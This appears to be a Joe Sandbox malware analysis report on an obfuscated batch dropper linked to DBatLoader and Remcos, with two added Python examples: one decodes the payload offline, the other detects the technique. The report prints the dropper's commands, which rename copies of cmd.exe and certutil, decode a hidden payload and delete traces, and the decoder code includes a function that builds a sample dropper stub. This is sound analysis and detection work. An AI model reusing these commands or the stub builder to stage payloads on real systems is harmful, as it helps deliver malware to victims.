C:\Users\Public\kn.exe | 0% | ReversingLabs | |
C:\Users\Public\kn.exe | 0% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | 0% | Avira URL Cloud | safe |
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | 0% | Avira URL Cloud | safe |
https://login.microsoftonline.com/%s/oauth2/token | 0% | Avira URL Cloud | safe |
https://login.microsoftonline.com/%s/oauth2/authorize | 0% | Avira URL Cloud | safe |
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | 0% | Avira URL Cloud | safe |
https://%ws/%ws_%ws_%ws/service.svc/%ws | 0% | Avira URL Cloud | safe |
https://enterpriseregistration.windows.net/EnrollmentServer/device/ | 0% | Avira URL Cloud | safe |
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | 0% | Virustotal | | Browse
https://enterpriseregistration.windows.net/EnrollmentServer/key/ | 0% | Avira URL Cloud | safe |
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | 0% | Virustotal | | Browse
https://enterpriseregistration.windows.net/EnrollmentServer/device/ | 0% | Virustotal | | Browse
https://login.microsoftonline.com/%s/oauth2/token | 0% | Virustotal | | Browse
https://login.microsoftonline.com/%s/oauth2/authorize | 0% | Virustotal | | Browse
https://enterpriseregistration.windows.net/EnrollmentServer/key/ | 0% | Virustotal | | Browse
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | false | Avira URL Cloud: safe | unknown
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | kn.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/%s/oauth2/authorize | kn.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/%s/oauth2/token | kn.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://%ws/%ws_%ws_%ws/service.svc/%ws | kn.exe | false | Avira URL Cloud: safe | unknown
https://enterpriseregistration.windows.net/EnrollmentServer/device/ | kn.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/ | kn.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
No contacted IP infos
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1483432
Start date and time: 2024-07-27 13:28:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Xirnkxhvuzwepe.cmd
Detection: MAL
Classification: mal72.bank.evad.winCMD@20/10@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 58
  • Number of non-executed functions: 213
Cookbook Comments:
  • Found application associated with file extension: .cmd
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtSetInformationFile calls found.
No simulations
No context
No context
No context
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\alpha.exe | megerosites.cmd | Get hash | malicious | DBatLoader, Lokibot | Browse |
 | Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | Payroll for July.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | 2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | Import_Tax Invoice_PL_xls_0000000000000000000 .exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | Quotation .exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | Request Quotation.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | MT103 BANK ERROR.PDF.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | M7RrbN4DTk.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
 | Request for quotation.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
C:\Users\Public\kn.exe | megerosites.cmd | Get hash | malicious | DBatLoader, Lokibot | Browse |
 | IAENMAIL-A4-240717-0830-0000909_PDF.cmd | Get hash | malicious | DBatLoader | Browse |
 | payment_confirmation.bat | Get hash | malicious | Remcos, DBatLoader | Browse |
 | Uplata_391.cmd | Get hash | malicious | DBatLoader | Browse |
 | PO-MISA-32493.cmd | Get hash | malicious | Remcos, DBatLoader | Browse |
 | PURCHASE_ORDER.CMD | Get hash | malicious | DBatLoader, Remcos | Browse |
 | ProofOfPayment.CMD | Get hash | malicious | DBatLoader, Neshta, Remcos | Browse |
 | ProofOfPayment.CMD | Get hash | malicious | DBatLoader, Neshta, Remcos | Browse |
 | proof.cmd | Get hash | malicious | DBatLoader, Remcos | Browse |
 | SWIFT_COPY20240604.cmd | Get hash | malicious | DBatLoader | Browse |
Process: C:\Users\Public\kn.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 2120706
Entropy (8bit): 3.850601544644915
Encrypted: false
SSDEEP: 24576:ytsZrhsYd5rWni2+0IOtg91Zq81Ma/PcVbXwITeWjI40FknOnNUk2dd9:Y
MD5: B5D3858CA38D7C4F624618C92AEBE879
SHA1: 925649D940266D6EDC2C239C112CF6719E5A83F7
SHA-256: C02463D1E9A27516F8FC3D0866C0188CD63FD6496CAB7089F6E5469EB5555905
SHA-512: 4731386DA453D75D0E236582A7E7339474C5BDD2EF6243EE9AF59719AFDC1470EA0ABA438C12373A482B11D3C820DBBF20D167BE59FE3C1D24080F1F9CA21E5B
Malicious: false
Reputation: low
                                          Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900e20600004809000000000000f4060000100000000007000000400000100000000200000400000000000000040000000000000000c01000000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000500e003a26000000100f0000a201000000000000000000000000000000000000a00e00846a000000000000000000000000000000000000000000000000000000900e00180000000000000000000000000000000000000008570e00f00500000000000000000000000000000000000000000000
Process: C:\Windows\System32\extrac32.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: modified
Size (bytes): 289792
Entropy (8bit): 6.135598950357573
Encrypted: false
SSDEEP: 6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1: F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256: B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512: 99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious: false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
  • Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:
  • Filename: megerosites.cmd, Detection: malicious, Browse
  • Filename: Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe, Detection: malicious, Browse
  • Filename: Payroll for July.exe, Detection: malicious, Browse
  • Filename: 2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe, Detection: malicious, Browse
  • Filename: Import_Tax Invoice_PL_xls_0000000000000000000 .exe, Detection: malicious, Browse
  • Filename: Quotation .exe, Detection: malicious, Browse
  • Filename: Request Quotation.exe, Detection: malicious, Browse
  • Filename: MT103 BANK ERROR.PDF.exe, Detection: malicious, Browse
  • Filename: M7RrbN4DTk.exe, Detection: malicious, Browse
  • Filename: Request for quotation.exe, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
Process: C:\Windows\System32\extrac32.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: modified
Size (bytes): 1651712
Entropy (8bit): 6.144018815244304
Encrypted: false
SSDEEP: 24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5: F17616EC0522FC5633151F7CAA278CAA
SHA1: 79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256: D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512: 3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious: false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
  • Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:
  • Filename: megerosites.cmd, Detection: malicious, Browse
  • Filename: IAENMAIL-A4-240717-0830-0000909_PDF.cmd, Detection: malicious, Browse
  • Filename: payment_confirmation.bat, Detection: malicious, Browse
  • Filename: Uplata_391.cmd, Detection: malicious, Browse
  • Filename: PO-MISA-32493.cmd, Detection: malicious, Browse
  • Filename: PURCHASE_ORDER.CMD, Detection: malicious, Browse
  • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
  • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
  • Filename: proof.cmd, Detection: malicious, Browse
  • Filename: SWIFT_COPY20240604.cmd, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
Process: C:\Users\Public\alpha.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 104
Entropy (8bit): 4.403504238247217
Encrypted: false
SSDEEP: 3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
MD5: E14D0D771A7FEB9D78EA3DCA9197BA2A
SHA1: 48E363AAD601D9073D803AA9D224BF9A7FC39119
SHA-256: 0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
SHA-512: 3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
Malicious: false
Preview: The system cannot find message text for message number 0x400023a1 in the message file for Application...
File type: ISO-8859 text, with very long lines (984), with CRLF line terminators
Entropy (8bit): 5.168549713905825
TrID:
File name: Xirnkxhvuzwepe.cmd
File size: 3'228'698 bytes
MD5: 41152edeb64fe66b4bbd10372223d23a
SHA1: bc226681860e303393e335ce81aecb6d13d13d5b
SHA256: cec24e6d4ef5928960be72f7794ee5cbe7ab4df57bd080116434724dc2ff7ebc
SHA512: 35d1189762e90bc9e41796bae629c76338e19f7e35c6249bbba5da2a291cbb0d39570d477aba3aba4740cd79503399dfdde2150c3d944cf777140fba0d5fd1a4
SSDEEP: 24576:tQa2jlXsFQaZgwQoq6JuxJ1ZQyl2Gb9+rFcHiY02St0pTKhCC7zCD8PWBZwmnO0D:tQa2J8FQQgt60xaYD8f6/ash
TLSH: 8AE552F339BD06D62B0F36EB579FE62D8A17CC2D56833DC00BC3358D1819A6AE454899
                                            File Content Preview:COMCOM..&@cls&@set "_..=pynZVg7@tkEwvS38eBNKG4PD bxT6cLX0zsOiCfmH2jF59uMaoAq1UJhlRYrdQIW"..%_..:~7,1%%.......%%_..:~34,1%%_..:~16,1%%_..:~8,1%%_..:~24,1%"_...=%_..:~20,1%%_..:~10,1%%_..:~19,1%%_..:~54,1%%_..:~61,1%%_..:~13,1%%_..:~12,1%%.......%%_..:~22,1
Icon Hash: 9686878b929a9886
No network behavior found

                                            Target ID:0
                                            Start time:07:28:50
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "
                                            Imagebase:0x7ff6a3ad0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:1
                                            Start time:07:28:50
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\extrac32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                            Imagebase:0x7ff665730000
                                            File size:35'328 bytes
                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:4
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 0%, Virustotal
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\extrac32.exe
                                            Wow64 process (32bit):false
                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                            Imagebase:0x7ff665730000
                                            File size:35'328 bytes
                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\kn.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                            Imagebase:0x7ff7fd790000
                                            File size:1'651'712 bytes
                                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 0%, Virustotal
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\kn.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
                                            Imagebase:0x7ff7fd790000
                                            File size:1'651'712 bytes
                                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true
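
Targets 7 and 9 are the two-pass unpack. kn.exe is the copy of certutil.exe made in Target 5, and the trailing `3` and `10` on the `-decodehex` lines are the optional format argument certutil passes to CryptStringToBinary: in wincrypt.h, 3 is CRYPT_STRING_BASE64REQUESTHEADER (a base64 body between `-----BEGIN NEW CERTIFICATE REQUEST-----` / `-----END NEW CERTIFICATE REQUEST-----` markers, text outside the markers ignored) and 10 is CRYPT_STRING_HEXADDR (a hex dump whose lines start with an offset and carry no ASCII column). So the first pass pulls the base64 block out of the .cmd into CLEAN.GIF, and the second turns that hex dump into CLEAN.COM. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that reimplements those two decodes so an analyst can recover the payload offline without ever running certutil. The dropper text it builds is constructed, the batch stub and `%~f0` in it are assumptions, and the HEXADDR parser (offset token, then hex pairs, offsets checked to be sequential) is an approximation of CryptStringToBinary's rules rather than a copy of them.

```python
import base64
import re

# CryptStringToBinary format values (wincrypt.h). certutil -decodehex takes the
# numeric value as its optional trailing argument, which is what the report shows.
CRYPT_STRING_BASE64REQUESTHEADER = 3   # base64 between NEW CERTIFICATE REQUEST markers
CRYPT_STRING_HEXADDR = 10              # "0000<tab>4d 5a 90 00 ..." hex dump with offsets

REQ_BEGIN = "-----BEGIN NEW CERTIFICATE REQUEST-----"
REQ_END = "-----END NEW CERTIFICATE REQUEST-----"


def decode_base64_request_header(text: str) -> bytes:
    """Pass 1 (type 3): decode the base64 between the REQUEST markers.
    Everything outside the markers, i.e. the batch commands, is ignored."""
    start = text.find(REQ_BEGIN)
    end = text.find(REQ_END, start + len(REQ_BEGIN)) if start >= 0 else -1
    if start < 0 or end < 0:
        raise ValueError("no NEW CERTIFICATE REQUEST block in input")
    body = re.sub(r"\s+", "", text[start + len(REQ_BEGIN):end])
    return base64.b64decode(body, validate=True)


def decode_hexaddr(text: str) -> bytes:
    """Pass 2 (type 10): each line is an offset token followed by hex byte pairs.
    Assumption: offsets are sequential; that is checked so a damaged or truncated
    dump fails loudly instead of yielding a silently shifted binary."""
    out = bytearray()
    for lineno, line in enumerate(text.splitlines(), 1):
        tokens = line.split()
        if not tokens:
            continue
        offset, pairs = tokens[0], tokens[1:]
        if int(offset, 16) != len(out):
            raise ValueError(f"line {lineno}: offset {offset} != {len(out):x}")
        if any(len(p) != 2 for p in pairs):
            raise ValueError(f"line {lineno}: malformed hex pair")
        out.extend(int(p, 16) for p in pairs)
    return bytes(out)


def recover_payload(cmd_text: str) -> bytes:
    """The full chain: .cmd -> CLEAN.GIF (hex dump) -> CLEAN.COM (binary)."""
    stage1 = decode_base64_request_header(cmd_text)
    return decode_hexaddr(stage1.decode("ascii"))


def encode_hexaddr(data: bytes, width: int = 16) -> str:
    """Inverse of decode_hexaddr, used only to build the constructed sample."""
    return "".join(
        f"{off:04x}\t" + " ".join(f"{b:02x}" for b in data[off:off + width]) + "\n"
        for off in range(0, len(data), width)
    )


def build_sample_cmd(payload: bytes) -> str:
    """Constructed dropper text modelled on the report's command lines: a batch
    stub, then the two-layer encoded payload. %~f0 (the batch's own path) is an
    assumption; the report's sample passes the full desktop path instead."""
    stage1 = encode_hexaddr(payload).encode("ascii")
    b64 = base64.b64encode(stage1).decode("ascii")
    wrapped = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return (
        "@echo off\n"
        r"C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe" "\n"
        r'C:\\Users\\Public\\kn -decodehex -F "%~f0" C:\\Users\\Public\\CLEAN.GIF 3' "\n"
        "exit /b\n"
        f"{REQ_BEGIN}\n{wrapped}\n{REQ_END}\n"
    )


if __name__ == "__main__":
    sample_payload = b"MZ\x90\x00" + bytes(range(40))   # constructed, not a real PE
    recovered = recover_payload(build_sample_cmd(sample_payload))
    print(recovered == sample_payload, len(recovered))
```

Run against a real dropper, `recover_payload(open(path, errors="replace").read())` gives the bytes certutil would have written to CLEAN.COM; if the offset check trips, the .cmd was truncated or tampered with and the output of certutil on the same file should not be trusted either.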

                                            Target ID:10
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true
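
Read as a whole, Targets 3 to 11 are a living-off-the-land chain: `extrac32 /C` copies cmd.exe and certutil.exe into C:\Users\Public under new names (alpha.exe and kn.exe are byte copies, so their MD5s are the System32 originals' MD5s, which is exactly the mismatch between hash and file name that a "copied with a different name" signature keys on), the renamed certutil decodes the dropper in two passes, and the renamed cmd deletes the intermediates with `del /q`. The Python below is an added example, not part of the Joe Sandbox report, of turning those observations into process-creation detection logic. The event records are constructed from the command lines above (the report's Target IDs stand in for PIDs), the field names are assumptions to be mapped from Sysmon Event ID 1 or EDR telemetry, and the hash baseline is filled here from the report's own entries, where in production it would come from a file inventory rather than from the alert.

```python
import re
from dataclasses import dataclass

# MD5 -> real name of System32 binaries. Seeded from the report's process entries;
# a real deployment takes this from an inventory of the gold image.
KNOWN_SYSTEM_HASHES = {
    "8A2122E8162DBEF04694B9C3E0B6CDEE": "cmd.exe",
    "41330D97BF17D07CD4308264F3032547": "extrac32.exe",
    "F17616EC0522FC5633151F7CAA278CAA": "certutil.exe",
}
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")
DECODE_FLAGS = {"-decode", "-decodehex", "-urlcache"}
CERT_EXTS = {".cer", ".crt", ".pem", ".der", ".p7b", ".req", ".csr", ".b64", ".txt"}


@dataclass
class ProcEvent:           # assumed field names
    pid: int
    image: str             # path of the executable image
    cmdline: str
    md5: str


def norm(path: str) -> str:
    """Drop quotes, collapse the doubled backslashes the dropper uses, lower-case."""
    return path.strip('"').replace("\\\\", "\\").lower()


def args_of(cmdline: str) -> list:
    return [norm(t) for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path: str) -> str:
    return norm(path).rsplit("\\", 1)[-1]


def detect(ev: ProcEvent) -> list:
    """Return the rule names that fire for one process-creation event."""
    hits = []
    image = norm(ev.image)
    name = basename(image)
    real = KNOWN_SYSTEM_HASHES.get(ev.md5.upper(), name)   # what the binary really is
    args = args_of(ev.cmdline)

    if real != name:
        hits.append(f"renamed_system_binary:{real}->{name}")
    if image.startswith(SUSPICIOUS_DIRS):
        hits.append("execution_from_suspicious_folder")
    if real == "extrac32.exe" and "/c" in args and len(args) >= 3:
        src, dst = args[-2], args[-1]            # extrac32 /C [/Y] <source> <dest>
        if src.startswith("c:\\windows\\system32\\") and dst.startswith(SUSPICIOUS_DIRS):
            hits.append(f"lolbin_copy_to_user_dir:{basename(src)}->{dst}")
    if real == "certutil.exe":
        flag = next((i for i, a in enumerate(args) if a in DECODE_FLAGS), None)
        if flag is not None:
            inp = next((a for a in args[flag + 1:] if not a.startswith("-")), "")
            bn = basename(inp)
            ext = bn[bn.rfind("."):] if "." in bn else ""
            if ext not in CERT_EXTS:             # decoding a .cmd or .gif is not PKI work
                hits.append(f"certutil_decode_of_non_cert:{bn}")
    return hits


def scan(events) -> dict:
    """Map pid -> fired rules for every event that triggers at least one rule."""
    return {ev.pid: detect(ev) for ev in events if detect(ev)}


# Constructed events taken from the report's Target 3, 4 and 7 command lines,
# plus one benign certutil use as a control.
EVENTS = [
    ProcEvent(3, r"C:\Windows\System32\extrac32.exe",
              r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"',
              "41330D97BF17D07CD4308264F3032547"),
    ProcEvent(4, r"C:\Users\Public\alpha.exe",
              r"C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe",
              "8A2122E8162DBEF04694B9C3E0B6CDEE"),
    ProcEvent(7, r"C:\Users\Public\kn.exe",
              r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3',
              "F17616EC0522FC5633151F7CAA278CAA"),
    ProcEvent(99, r"C:\Windows\System32\certutil.exe",
              r"certutil -verify C:\Users\user\site.cer",
              "F17616EC0522FC5633151F7CAA278CAA"),
]

if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, rules)
```

The hash-versus-name rule is the one worth keeping even if the others are tuned away: it does not care what the copy is called or which LOLBin made it, only that a known System32 binary is running from a path it should not be at.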


                                              Execution Graph

                                              Execution Coverage:5.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:36.9%
                                              Total number of Nodes:664
                                              Total number of Limit Nodes:27
